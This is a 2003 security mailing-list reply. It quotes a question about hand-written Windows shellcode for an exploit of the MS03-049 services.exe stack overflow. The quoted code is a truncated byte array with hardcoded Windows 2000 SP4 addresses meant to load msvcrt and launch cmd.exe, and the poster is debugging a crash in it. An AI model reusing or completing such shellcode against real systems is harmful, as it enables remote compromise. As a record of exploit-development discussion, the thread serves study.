Re: Win32 Shellcode question.

From: Tobias Klein (tobias.klein_at_ewetel.de)
Date: 12/01/03

  • Next message: Brett Moore: "RE: [PenTest] Re: Win32 Shellcode question." 
    Date: Mon, 01 Dec 2003 09:07:12 +0100
To: "Vinay A. Maha***" <devnull001@fastmail.fm>, vuln-dev@securityfocus.com, pentest@yahoogroups.com

    http://www.newroot.de/projects/winsys.c
    greets newroot

    At 19:29 27.11.2003 -0800, Vinay A. Maha*** wrote:
    >I was writing an exploit for the MS03-049 services.exe stack overflow vuln
    >(from scratch for my own academic interest). Here's my shellcode to simply
    >launch a "cmd.exe" shell.
    >
    >#define LL 0x7C4F05CF
    >#define SYS 0x78018EBF
    >
    >char payload[] = {
    > 0x55, // push ebp
    > 0x8B, 0xEC, // mov ebp,esp
    >
    > 0x33, 0xC0, // xor eax,eax
    > 0x50, // push eax
    > 0x50, // push eax
    > 0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63,
    > // mov dword ptr [ebp-8],6376736Dh
    > 0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,
    > // mov word ptr [ebp-4],7472h
    > 0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
    > 0x50, // push eax
    > 0xB8, 0xCF, 0x05, 0x4F, 0x7C, // mov eax,LL
    > 0xFF, 0xD0, // call eax <------------ Problem call
    > 0x8B, 0xE5, // mov esp,ebp
    >
    > 0x33, 0xC0, // xor eax,eax
    > 0x50, // push eax
    > 0x50, // push eax
    > 0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E,
    > // mov dword ptr [ebp-8],2E646D63h
    > 0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,
    > // mov word ptr [ebp-4],7865h
    > 0xC6, 0x45, 0xFE, 0x65,
    > // mov byte ptr [ebp-2],65h
    > 0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
    > 0x50, // push eax
    > 0xB8, 0xBF, 0x8E, 0x01, 0x78,
    > // mov eax,SYS
    > 0xFF, 0xD0, // call eax
    >...
    > };"
    >
    >After the overflow, I can step through the NOP sled, and reach the above
    >payload - meaning I have control over the CPU's exec path, and can make it
    >execute my payload. However, I keep getting an "Access Violation" writing
    >location.. error inside the "call eax" that corresponds with
    >LoadLibrary("msvcrt").
    >
    >I have confirmed the LL and SYS variables for the target (Win2k SP4).
    >Plus, the payload works just fine when compiled and executed outside of
    >services.exe . Is there something special about services.exe that prevents
    >LoadLibraryA from executing normally or what did I do wrong? Can you spot
    >anything I am overlooking? The same payload has worked on other
    >stack-overflow exploits, and inside a simple main(){} loop.
    >
    >Thanks,
    >Vinay.

  • Next message: Brett Moore: "RE: [PenTest] Re: Win32 Shellcode question."
    • Quantcast